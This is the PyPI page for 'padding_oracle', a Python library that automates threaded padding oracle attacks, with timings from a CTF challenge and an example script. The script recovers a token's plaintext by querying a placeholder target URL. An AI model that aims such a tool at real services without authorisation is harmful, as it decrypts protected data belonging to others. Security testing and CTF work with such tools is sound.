Threaded padding oracle automation.
Project description
padding_oracle.py
Fast threaded padding oracle attack automation script for Python 3.
Install
PyPI:
pip3 install -U padding_oracle
GitHub:
pip3 install -U git+https://github.com/djosix/padding_oracle.py.git
Performance
Tested on [0x09] Cathub Party from EDU-CTF:
Request Threads | Execution Time |
---|---|
1 | 17m 43s |
4 | 5m 23s |
16 | 1m 20s |
64 | 56s |
Usage
Let's say we are going to test https://the.target.site/api/?token=BASE64_ENCODED_TOKEN
from padding_oracle import padding_oracle, base64_encode, base64_decode
import requests, string
sess = requests.Session() # for connection pool
url = 'https://the.target.site/api/'
def check_decrypt(cipher: bytes):
resp = sess.get(url, params={'token': base64_encode(cipher)})
if 'failed' in resp.text:
return False
elif 'success' in resp.text:
return True
else:
raise RuntimeError('unexpected behavior')
cipher = base64_decode('BASE64_ENCODED_TOKEN')
# becomes IV + block1 + block2 + ...
assert len(cipher) % 16 == 0
plaintext = padding_oracle(
cipher, # cipher bytes
block_size = 16,
oracle = check_decrypt,
num_threads = 16,
chars = string.printable # possible plaintext chars
)
This package also provides PHP-like encoding/decoding functions:
from padding_oracle.encoding import (
urlencode,
urldecode,
base64_encode,
base64_decode,
)
License
This project is licensed under the terms of the MIT license.
Project details
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
Source Distribution
padding_oracle-0.2.3.tar.gz
(6.7 kB
view hashes)
Built Distribution
Close
Hashes for padding_oracle-0.2.3-py3-none-any.whl
Algorithm | Hash digest | |
---|---|---|
SHA256 | b6bdf63f060cf15b8ba73a88119c975e40d138fd16e5a19cc6b5fafe8eaef63e |
|
MD5 | 373882542dcb10510c9fb2fed83817f1 |
|
BLAKE2b-256 | 23f4f25dcbc757fbed85a75a7bbb5330431124416549059557f0444b55004723 |